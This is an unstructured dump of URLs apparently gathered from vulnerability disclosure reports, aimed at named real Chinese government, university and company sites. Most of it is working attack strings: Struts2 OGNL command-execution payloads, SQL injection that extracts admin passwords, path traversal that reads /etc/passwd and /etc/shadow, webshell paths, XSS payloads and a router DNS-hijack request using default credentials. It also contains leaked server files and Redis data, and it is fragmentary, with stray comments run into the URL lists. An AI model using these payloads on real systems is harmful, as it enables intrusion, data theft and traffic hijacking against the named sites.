http://219.141.254.195/djqy/doc/allfiles/20/21200822_2062695187.jsp?cmd=命令 http://219.141.254.195/djqy/doc/allfiles/20/21200822_2062695187.jsp?cmd=ifconfig http://119.6.251.107:8080/uniportal/frame/welcome.action http://119.6.251.107:8080/uniportal/frame/welcome.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://119.6.251.107:8080/uniportal/hsxa.jsp http://119.6.251.107:8080/uniportal/myxx.jsp http://zhuanti.club.news.sohu.com/user_webpage/del_kind_form.php?kindid=125821 http://zhuanti.club.news.sohu.com/user_webpage/modify_content_form.php?kindid=125819 
http://zhuanti.club.news.sohu.com/user_webpage/del_kind_form.php?kindid=125821%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 http://www.ijob.gov.cn/web/personsearch.action bbs.manaren.com/uc_server//index.php?m=pm_client&a=view&pmid=1029&folder=outbox&filter=&extra=page%3D http://home2.xywy.com/index.php?type=index&uid=1970053 http://weibo.com/comment/A9BrmkUjG http://wooyun.org/bugs/wooyun-2010-023055 http://www.hillstonenet.com.cn/training/registration.php?id=314%27 Query:SELECT Error:You Errno:1064 Message:MySQL http://www.hzsrsj.gov.cn/lemis/netweb/detail/download.jsp?url=/&filename=WEB-INF/web.xml http://www.hzsrsj.gov.cn/lemis/LogonDialog.jsp event21.wanmei.com/w2i/pwic/w2iPwic!show.action?id=315 http://www.gs.zjut.edu.cn/zsxx/qita/grs/Editor/存在遍历目录 http://www.gs.zjut.edu.cn/zsxx/qita/grs/Editor/db/beditor1013.mdb http://mo-fang.com/shop_show.php?id=609 http://download.enet.com.cn/php/clist.php?cid=3 http://www.361tuan.com/chengdu/groupbuy/oldBuyDetail.action?groupbuyID=8 www.baidu.com@wooyum.com.本来想传个图的。但是奈何本屌的手机不行啊。手机的截图放到电脑就高级马赛克了。。。 http://bk.qz828.com/1.rar http://houe.qz828.com/1.rar http://house.e.qz828.com/1.rar http://www.qz828.com/1.rar http://wwws.qz828.com/1.rar http://wwwt.qz828.com/1.rar http://wwww.qz828.com/1.rar http://zblog.qz828.com/1.rar http://expert.womai.com/wp-login.php http://expert.womai.com/wp-login.php http://maishihui.womai.com/ http://expert.womai.com/maifood/wp-login.php http://s.mogupai.com/content.php?id=119 http://www.tysci.com http://www.tysci.com/downloads/ http://www.ncedu.com.cn:8080/cms/web/downloadFiles.jsp?file=/etc/shadow直接在file参数后面写上文件绝对路径,便可以下载获取到相应文件 http://www.ncedu.com.cn:8080/cms/web/downloadFiles.jsp?file=/etc/apache/httpd.conf http://tz.loupan.com/loupan/xinmingbandaoyunshuixuanshangpu http://www.vansn.com/user/userLogin.action http://egov.xinjin.gov.cn:8081/aems/login/login!userLogin.action http://221.237.182.14:8081/APMS/login/login!userLogin.action 
http://www.zwzx.day.gov.cn/APMS/login/login!userLogin.action http://mail.shmetro.com bbs.manaren.com/uc_server//index.php?m=pm_client&a=view&pmid=28518&folder=inbox&filter=announcepm&extra=page%3D http://www.zhulang.com/w_book_info.php?bookid=192883&c=../../../../../../../../../../etc/passwd%00.jpg http://baozoumanhua.com/fetchpass http://baozoumanhua.com/login http://60.247.100.70:9090/webstat/ucstarclient_webcall/client/ucallclient_1.jsp http://60.247.100.70:9090/upload/ http://gpassport.gsta.com/Login.aspx?url=http%3a%2f%2fwww.gsta.com%2fadmin%2f http://gmy.gsta.com//profile.aspx/?userid=1 http://gpassport.gsta.com/Login.aspx?url=http%3a%2f%2fwww.gsta.com%2fadmin%2f http://gadmin.gsta.com/ www.zhulang.com http://t.sohu.com/follow/addfollows http://www.zhulang.com/ http://58.60.0.82:8080/sms/UserInfoAction.action www.e696.com http://project.ccidnet.com/cases/page/template/searchCases.do?method=showCase&classid=1&appclass1=0&appclass2=0&dataorder= http://tv.tom.com/App_User_UserUpload.php?type=1&us http://www.swqdsj.gov.cn/admin/login.aspx http://113.247.238.148:4000/kfqy/ http://113.247.238.148:4000/kfqy/admin/save_psw.jsp?oldpsw=1 http://www.800app.com/company/crm-onlinekhfk.htm http://www.cpgroup.cn/Search.aspx?keys= https://passport.baidu.com/?getpass_index http://www.cnave.com/fckeditor/editor/fckeditor.html http://kfgl.hasee.com///lookup/peizhi/ http://www.lvye.org/modules/lvyebb/rate.php?id=44245623%20union%20select%20current_user%2Cpassword%20%20from%20mysql.user%20-- http://mail.chinasarft.gov.cn/ http://bookshop.cnpeak.com.cn/vip/EditUserInfo.aspx http://www.cnpeak.com/ http://group.cnpeak.com/ http://bookshop.cnpeak.com.cn/ http://nanlew.com/ http://www.nanle.gov.cn/ http://www.0393vip.com/35/好像是防的精良网站源码,可以进行cookie注入。后台账号:admin http://www.pybxxh.com/ http://www.nanle.gov.cn/ http://nanlew.com/ http://www.zyxxg.cn/ http://www.pyxxg.cn/ http://www.pyssyj.com/ http://520393.com/ http://zhaoren.t.qq.com/groupfrds.php?group_id=4006 ID:3的管理员账号 
http://shizheng.xilu.com/20130917/1000010000094910.html http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=121.157.39.111&dnsserver2=114.114.114.114&Save=%B1%A3+%B4%E6 admin:admin,会变化,例如admin:123456,也就是利用路由器默认密码不断尝试修改路由器dns为121.157.39.111、114.114.114.114。 http://gz.dagushu.com/center.html。 http://gz.dagushu.com/center.html http://newspage.xilu.com/model/xilu_bottom.js http://www.tw.zjut.edu.cn/ http://www.china918.net/91805/newxp/Special_News.asp?SpecialID=26 http://www.china918.net/zlg/admin/login.asp http://www.china918.net/91801/newxp/admin/login.asp http://www.china918.net/91805/newxp/admin/login.asp http://www.china918.net/91806/newxp/admin/login.asp http://www.china918.net/91807/newxp/admin/login.asp http://www.china918.net/91808/newxp/admin/login.asp http://www.china918.org http://www.china918.cn http://www.gdjjs.zjut.edu.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://cftv.forestry.gov.cn:8080/ivss/web/jwzt/service09/meetingRoom/upload_img.jsp http://www.hengdianworld.com/index/index.do http://219.142.122.150:81 http://match.jxedu.gov.cn http://tieba.baidu.com/home/main?un=%E4%B9%8C%E4%BA%91 http://v.56.com/2006.php?qq-pf-to=pcqq.group http://bbs.xiangyang.net fair.sme.gov.cn/old/upload/pic/pic2320_02.jsp www.jh.gov.cn http://blog.emaze.net/2013/09/a-look-at-wechat-security.html http://static.apk.hiapk.com/html/2012/06/614689.html http://apk.hiapk.com/html/2012/11/997381.html http://apk.hiapk.com/html/2013/05/1495796.html https://play.google.com/store/apps/details?id=com.tencent.mm http://www.95590.cn/ebiz/view/onlineser/policyInfoDetail.jsp?policyNo={保单号 
http://www.dfyb.com/sales/ProductPhoto.asp?productid=21 http://activity.zhulang.com/20120701wot/index.php?m=20120701wot&a=ReadBook&bk_id=63 http://m.airchina.com/atompub/form/air_user_management_html5?o=w&passengerId=614972&tempOrderId=0&isInternation=&n=tms.do%3FtranCode%3DTM0007 http://m.airchina.com/atompub/form/air_edit_record_html5?o=w&orderId=344391&n=tms.do%3FtranCode%3DGJ0008 www.114school.com.那么我们如何获取有用的电话号码呢?左边有一个找人按钮。可以根据关键词查找。随便输入152这样的数值。会出现很多手机号码。那么我们如何知道这个人是老师呢。可以通过查看微博的方式 http://www.sc.cei.gov.cn/Netw2Web/portal.aspx?APP=1 http://cglx.51taoshi.com/list.php?item_handle=xwhd http://www.uyan.cc/demo display:none http://tuan.mangocity.com/product/productList.aspx?city=%e4%b8%89%e4%ba%9a&productCount=1314 http://www.blsxzfw.gov.cn/css2.jsp http://www.center.gov.cn/evip/css2.jsp http://wscwh.gaoyou.gov.cn/css2.jsp http://www.dyqsk.gov.cn/k8cmd.jsp http://log.sanguosha.com/record2.php http://log.sanguosha.com/record2.php?logtype=1&logversion=1&logmessage=1&clienttype=1&clientversion=%28select%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29&account=1&nickname=1&userlevel=1&logintime=now%28%29 http://data.futures.hexun.com.tw/cccj.aspx http://renwu.hexun.com/search.aspx?z=A http://wizard.stock.hexun.com/tgfw_new/ifame2.aspx?teacher=%EF http://www.mingshitang.com/webadmin/ http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=/etc/passwd youkubj-pms:x:535:535::/var/www/html/youkubj-pms:/sbin/nologin http://minisite.youku.com/youkubj-pms/ http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=/var/www/html/youkubj-pms/include/common.php http://121.33.237.70:9090/login.jsp http://121.33.237.70:9090/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://121.33.237.70:9090/UserFiles/File/ http://121.33.237.70:9090/upload/szgov.xls 
http://www.huyigroup.com.cn/manage/specialClient.php http://www.huyigroup.com.cn/control/gallery.swf/.php http://www.huyigroup.com.cn/public/upload/uploadImage/2013/0920/13796701183325.jpg/.php IP:180.153.106.41 IP:180.153.106.42 http://renwu.hexun.com.tw/search.aspx?z=A http://data.quanshang.hexun.com.tw/zcxx/zcselect.aspx?name= http://125.91.6.66/ http://sp.mcc17.cn/index.action video.bnup.com/acenter/bottom.action http://101.36.88.180/index.action http://219.228.48.112:8080/acenter/index.action inurl:bottom.action‎ http://58.56.128.67/pc/pc.html http://58.56.128.67/manager http://www.koolearn.com/ http://dwgk.kflz.gov.cn/E_ReadNews.asp?NewsID=6551 http://oa5.hanweb.com/notice/admin/login/login.action http://oa6.hanweb.com/jact/admin/login/login.action http://demo.hanweb.com/jact/front/front_reg.action http://demo.hanweb.com/jact/front/front_mailstat.action http://demo.hanweb.com/jact/front/front_mailwrite.action site:hanweb.com filetype:action http://demo.hanweb.com/jact/1.txt http://lelink.lenovo.com.cn/ReadMe.txt http://ideaclub.lenovo.com.cn/forum/uc_server/admin.php http://e-learning.lenovo.com.cn/forum/forumdata/plugins/shell.lang.php http://www.oaj.cas.cn/web.rar http://about.58.com/complain/sendValidCodeAjax?phone=手机号码 http://office.caas.net.cn/list.asp?id=9367 http://office.caas.net.cn/list.asp?id=9367 www.oldcaas.net.cn http://www.9718.com/manage/manage.php http://www.9718.com/control/gallery.swf/.php http://www.9718.com/public/upload/img/1379733672.jpg/.php http://www.coolyun.com/common4.0/1.jsp http://www.coolyun.com/1.jsp http://58.56.128.81:8080 http://58.56.128.81:8080/login.jsp?userid=admin http://www.cashyd.ac.cn/login.asp http://3g.k.sohu.com/api/vm/view_comment.do?m=list&newsId=11669516 http://i.hjsm.tom.com/?c=user.book.mybook&a=comment&bookid=115315 http://i.hjsm.tom.com/index.php?c=user.book.chapter&a=mod&bookid=128388&volumeid=279735&chapterid=850240 
http://project.ccidnet.com/cases/page/template/manufactuterData.do?method=searchCase&m_id=4500&classid=&appclass1=&appclass2=&keyword= http://project.ccidnet.com/cases/page/template/caseUserComment.do?method=getUserComment&c_id=1331 http://yjs.ciomp.ac.cn/data.rar http://show.aili.com/index.php?m=content&c=goods&a=goodsShow&gid=5071273无限评论 http://www.cefc.co/business.php?te=025&&type=002 http://113.108.100.168/ http://www.gzbhno.ac.cn/web.rar http://www.yitel.com/WebInfo/MemberActivityInfo.aspx?AcitvityID=21 http://yztoday.yznews.com.cn/yzjswmw/commentadmin.asp http://yztoday.yznews.com.cn/yzjswmw/write.asp http://www.scswl.cn/homepage.php/admin/member-profile http://mail.mos.gov.cn http://www.sbxcz.gov.cn/homepage.php/admin/member-profile http://8.7k7k.com/ http://8.7k7k.com/editThread.html?threadId=xxxx http://8.7k7k.com/listThread-barid-12-tid-303662.html http://8.7k7k.com/listThread-barid-12-tid-303670.html http://8.7k7k.com/editThread.html?threadId=303662 http://8.7k7k.com/editThread.html?threadId=303670 xlink:href没有过滤这是硬伤啊。接下来只要能让我插入math标签,这个问题基本上就算是解决了。 http://wh.vanke.com/bbs/ http://wh.vanke.com/bbs/login.asp http://www.sn.stats.gov.cn:7856/wsbs/17/detail5.jsp?contentId=1260 http://admin.baicai.com/ http://www.86gw.com/marry/set_index.php?action=set_memberstore&sid=165 http://www.86gw.com/marry/marryadmin/web/ http://www.86gw.com/marry/marryadmin/images/images1/1379826379_1379826379.php site:tencent.com http://isux.tencent.com/about http://isd.tencent.com/ http://impd.tencent.com/ http://isux.tencent.com/ http://flashteam.tencent.com/ http://cdc.tencent.com/ http://www.alloyteam.com www.alloyteam.com这台服务器没有加固,wp-login.php http://www.alloyteam.com/ http://www.wuhusrj.gov.cn/NewsDetail.aspx?pNewID=4764776 http://58.56.128.17:8888/ http://58.56.128.17:8888/public/ http://58.56.128.17:8888/project/bak/com/neukingstone/common/里也有java的源码 http://58.56.128.17:8888/common/ http://58.56.128.17:8888/common/deptduty.jsp 
http://58.56.128.17:8888/project/bak/com/neukingstone/ http://58.56.128.17:8888/project/bak/com/neukingstone/util/DAO.java~1~ http://58.56.128.17:8888/common/selmultiman.jsp http://58.56.128.17:8888/common/selmultiman.jsp?userGroup=2 http://58.56.128.139:9999 http://58.56.128.139:9999/dev_password.php http://58.56.128.139:9999/user_rapid_bind.php http://58.56.128.139:9999/php/WebDocList.php http://58.56.128.139:9999/auditfile/ http://58.56.128.139:9999/config/ http://58.56.128.139:9999/.svn/ http://nc.vanke.com/webserver/indexnew.aspx?classid=1 http://szvkh.vanke.com/house/albums01.aspx?hid=2 http://szvkh.vanke.com/house/albums01.aspx?hid=2 http://mail.nwsuaf.edu.cn/web2/main.html?session_key=********&user=******_nwsuaf_edu_cn data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+ http://bbs.fc.xunlei.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://www.dlbestcity.gov.cn/?page=details&id=654&categoryid=22 http://www.dlbestcity.gov.cn/admin/login.asp后台登陆地址 http://www.ikuai8.com/helplist.php http://www.ikuai8.com/web.zip http://www.ikuai8.com/111.php http://www.ikuai8.com/conf.php http://admin.baicai.com/system/feedback/feedback-edit.php?fid=24954 http://auth.baihe.com/id5/sendAuthId5.action?authedFrom=0需要登录 http://legc.lenovo.com http://legc.lenovo.com/lefactory/staticContent?type=originalAvatar&filename=../../../../etc/passwd http://www.ah-gree.com/index.php/module/action/param1/$%7B@phpinfo%28%29%7D http://m.so.com/index.php?a=transcode&m=b6fd8a40b712b8a76468f304f577dd56dd1dd3dc&u=http://www.yinyuetai.com/fanclub/22594&q=exo&pn=1 IP:115.182.21.5 www.ccidnet.com IP:115.182.21.11 IP:115.182.21.15 www.ccidedu.com IP:115.182.21.22 IP:115.182.21.40 www.ccidreport.com http://search.cnipr.com/pages!advSearch.action http://chuang.yicai.com/space.php?do=thread&uid=268214&tid=178783&peopleid=master&id=178783 
http://www.xingshan.gov.cn/cms/webback/Login.action http://bfmz.0375.com/bfmz.rar http://www.bfmz.gov.cn/ http://www.youyouwin.com/dev/games/play/id/125974?xmlFolder=http://www.youyouwin.com/xml http://www.gdpe.cn/ http://fy.hnsfj.gov.cn/ahsffyww/Default.action http://www.360sky.com/youxizx.jsp?classid=20&fileid=9343095 http://www.360sky.com/download/games.jsp?classid=19 http://www.360sky.com/moregame.jsp?pages=1&typeid=226 http://sd.bbs.house.sina.com.cn/bbs/forum/albumshow/?fid=1408886712113880 http://smtp.mop.com/extmail/cgi/index.cgi http://www.wap1934.com/ http://www.bzsmzj.gov.cn/ http://www.bomaitech.com/index.php/module/action/param1/$%7B@phpinfo%28%29%7D http://www.ahboquan.com/index.php/module/action/param1/$%7B@phpinfo%28%29%7D data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ2dvb2Qgam9iJyk7PC9zY3JpcHQ+PC9zdmc+ http://www.sqzfcg.gov.cn/admin/ http://www.12371.rzdj.gov.cn/portal/dwgl/portal-dwgl.action http://www.hnnx.com http://www.hnnx.com/sysadmin/editor/admin/login.jsp http://www.hnnx.com/upload/201309/20130923155357674.jsp http://www.chinashippinginfo.net/framesub/curve_demo.aspx?indextypeid=6 GHDBinurl:doc/page/login.asp http://www.scsnmz.gov.cn/data.rar http://mzj.qzlc.gov.cn/1.rar http://drops.wooyun.org/webview.html http://www.butao.com/biz/signup.php?step= ubuntu:/tmp$ PHPREDIS_SESSION:htioc1de81mpn186enogjmp2o7 http://dev.duoshuo.com/";s:3:"sso";i:0;}login_referer|s:23:"http://dev.duoshuo.com/";expire_check|i:1379999870 redis_version:2.6.7 redis_git_sha1:00000000 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.7.2 process_id:31597 run_id:63c0e3afd59fb79c433352120e98cc153720aebe tcp_port:6379 uptime_in_seconds:7742630 lru_clock:1685114 connected_clients:420 used_memory:761047736 used_memory_human:725.79M used_memory_rss:820125696 used_memory_peak:939262296 used_memory_peak_human:895.75M 
used_memory_lua:31744 mem_fragmentation_ratio:1.08 mem_allocator:jemalloc-3.0.0 rdb_changes_since_last_save:96044 rdb_last_save_time:1379999912 total_connections_received:5813336406 total_commands_processed:11626595357 instantaneous_ops_per_sec:5764 expired_keys:1844913653 keyspace_hits:3961937815 keyspace_misses:1851335123 latest_fork_usec:44840 role:master used_cpu_sys:951291.94 used_cpu_user:465259.50 used_cpu_sys_children:63797.91 used_cpu_user_children:337456.16 db0:keys=1311659,expires=1311533 db1:keys=395670,expires=0 http://hd.bjsme.gov.cn:8080/index.action www.gzdaj.gov.cn/gzjy/runroom.action www.xanet110.com/default/_ www.xanet110.com/default/User_BA_Manage_edit.aspxID=9863& http://211.103.158.26/ http://211.103.158.26/smenu.php?menu=../../../../../../../../../../etc/passwd%00.jpg root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL 
daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash uuidd:x:101:104:UUID daemon:/var/lib/libuuid:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin mswap:x:500:500:mswap:/home/mswap:/bin/bash http://211.103.158.26/smenu.php?menu=../../../../../../../../../../etc/resolv.conf%00.jpg http://211.103.158.26/smenu.php?menu=../../../../../../../../../../proc/version%00.jpg http://www.ahszmz.gov.cn/ahszmz.rar http://www.158pe.com/var/usp/webapps/onestopen/?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://www.cccc-jjgs.com/ViewArticle.aspx?ID=45047 http://fyqc.app.cnsaas.com/ http://www.xigou100.com/sns/ http://www.jnsgzw.com/web.rar http://www.forestry.gov.cn/DownloadFile.jsp?filename=../WEB-INF/web.xml http://www.forestry.gov.cn/DownloadFile.jsp?filename=../WEB-INF/ccmcms.properties http://www.baoji.gov.cn/DownloadFile.jsp?filename=../WEB-INF/ccmcms.properties http://www.baoji.gov.cn/ccmbam/upload/upload.jsp 
http://www.sxgxt.gov.cn/AccountAction.do?dispatch=listAccount http://www.sxpop.gov.cn/AccountAction.do?dispatch=addAccountjump&cmsuserid=1 http://www.sxpop.gov.cn/indexAction.do?dispatch=AccountLogin http://www.forestry.gov.cn/DBAction.do?dispatch=exportTable http://yjb.shaanxi.gov.cn/DBAction.do?dispatch=exportTable http://www.ourfuture.cn/TemplateAction.do?dispatch=listTemplate http://www.ourfuture.cn/WebSiteAction.do?dispatch=listWebsite http://www.ourfuture.cn/UsersInfoAction.do?dispatch=usersInfoList http://www.yl.gov.cn/search.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://admin.tzjt.gov.cn/admin/login.action http://mail.swsc.com.cn/ http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/httpd/conf/httpd.conf http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/resolv.conf http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/passwd http://mail.swsc.com.cn/?tn=../../../../../../../../../../proc/version http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/sysconfig/iptables-config http://mail.swsc.com.cn/?tn=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0 http://www.czdmw.gov.cn/index.action http://bbs.17173.com inurl:bbs.17173.com/space http://www.baidajob.com/advisor/article/detail?article_id=15 http://www.baidajob.com/advisor/article/detail?article_id=15 http://www.dji.com/wp-config.php.bak http://www.dji.com/config.php http://wenku.115.com/index.php?ct=doc&ac=search&key http://www.wasu.cn/.svn/entries http://www.jagzw.gov.cn/cn.rar http://wuhan.whhd.gov.cn/info/gszx/gmjj.jsp 
http://wuhan.whhd.gov.cn/info/gszx/wstz.jsp http://www.mbclpresscenter.com.cn/admin/Default.aspx http://tct.tcsos.com/ http://snap.chinaren.com/resin-admin/ file:///mnt/sdcard/hehe.html。向欧鹏浏览器发送请求要求打开一个页面时,即可触发 http://www.autren.com:80/en/seach.aspx?key= http://www.sense-idea.com/Install/ http://www.sense-idea.com/index.php/module/action/param1/$%7B@phpinfo%28%29%7D http://www.rz.gov.cn/rzgov.rar http://www.lystyj.gov.cn/textdetail.php?ID=568 http://t.jiapin.com/second/catindex?cat_id=2 http://www.lhmzj.gov.cn/ http://www.sdty.gov.cn/bak.rar http://show.tom.com/.svn/entries http://game.tom.com/.svn/entries http://image.637.tom.com/root/software/log.txt http://image.637.tom.com/manager/html http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.wooyun.org/ file:///mnt/sdcard/hehe.html。向傲游浏览器发送请求要求打开一个页面时,即可触发 http://218.58.70.132/admin/ http://www.wzmzw.gov.cn/wwwroot.rar http://scm.vipshop.com/bak/scm.war http://scm.vipshop.com/jit/jit_orderlist.jsp http://scm.vipshop.com/system/userinfo/list.jsp http://scm.vipshop.com/scm/middle.jsp http://www.hnlsj.gov.cn/1.rar http://www.hnchangning.gov.cn/wwwroot.rar http://ht.7k7k.net/login http://218.58.70.196/ http://my.xcar.com.cn/ajax/ajax_friend.php http://app.114la.com/?q=88952634 http://i.36kr.net/user/uid/22834 http://www.ynld.gov.cn/wwwroot.rar http://www.wangfujing.com/emall/.svn/entries http://www.wangfujing.com/webapp/wcs/stores/.svn/entries http://www.yncn.gov.cn/web.rar http://www.chinashippinginfo.net/web.rar http://www.px.gov.cn/bak.rar http://kychat.koyoo.cn/TaskService/webChatAndLeaveWord.action http://www.yixian.gov.cn/root.zip http://login.360.cn/?o=sso&m=info&func=QiUserJsonP1380012848446&show_name_flag=1关注 http://tao.360.cn/f_user_shop_api.html?shopid=2030&mod=del取消关注 http://bbs.tuniu.com/ http://bbs.tuniu.com/forum.php?mod=attachment&findpost=ss&aid=1 http://lecture.pku.edu.cn/video1/video.php?id=1399 http://116.204.96.235/admin.php 
http://donation.onefoundation.cn/,于是测试之,admin账户已经被锁定,但是我们有editor账户 http://116.204.96.235/admin.php http://www.ziteng.tv/zvAction!toCustomer http://www.ziteng.tv/zvAction!toCustomer www.ziteng.tv/ROOT/ http://service.allinpay.com:8080/ www.hao123.com的页面看到的,广告你都打到哪里了,怎么这么低级的漏洞都存在,几处反射型的xss跟存储型的xss,由于过了好久了,今天去xss平台才看到的,他们管理员好懒,都快半个月了才审核出来。。 www.kstong.net在同一个ip上 www.kstong.net居然在一台服务器上,而且通过img.kstong.net居然能够读取www.kstong.net所有源代码。这个域名下怎么就不解析呢,这是肿么一回事,我也没搞懂呀!随便展示2个吧!! http://center.wenxue24.com/lesson/Lesson_Class_info.asp?id=110019039007210735&Type=2&nocache=1379422030623 http://www.cwca.com.cn/indexSiteMapAction!list.action http://8.7k7k.com/ http://money.finance.sina.com.cn/q/view/FinanceCase.php?=88952634&age=1&fmy_ct=1&fmy_ic=1 http://inn1000.com/News-list.php?id=3 http://www.inn1000.com/config/ http://www.inn1000.com/page/ http://www.inn1000.com/admin/default.php http://www.store.cn/index.php?m=maillist&act=city&cityid=beijing http://med.tcl.com/admincp.php http://bit.tcl.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php http://www.wujiok.com/无极在线 http://sjr.sh.gov.cn/1.rar http://www.12318.gov.cn/manager/wljb/viewJbinfo.action?jbId=5,575,817存在最新struts2漏洞,可以直接执行命令,通过添加用户直接进入服务器 http://oa.huapu.com/c6/JHSoft.Web.Login/ http://oa.huapu.com/c6/Jhsoft.Web.login/PassWord.aspx http://www.jnfyw.gov.cn/ww1.rar http://www.nzjcy.gov.cn/nzjcy.rar http://www.ycsjcy.gov.cn/web.rar http://gls.tcl.com/login.aspx http://www.haiercrm.com http://big5.tcl.com/DRP/login.action http://sgdatabase.unwomen.org/home.action http://www.happy-g.com.cn/app/yy_home.action http://[马赛克].com/hy_hyxx.asp http://[马赛克].com/hy_hyxx.asp http://www.ccsnw.gov.cn/ http://www.msg189.com/userLogin.action http://www.msg189.com/css.jsp http://www.msg189.com/manageLogin.jsp http://www.msg189.com/userLogin.action http://www.pxagri.gov.cn/pxagri.zip http://www.xggxq.gov.cn/web.rar http://www.scmb.gov.cn/wwwroot.rar http://www.yeda.gov.cn/yeda.rar 
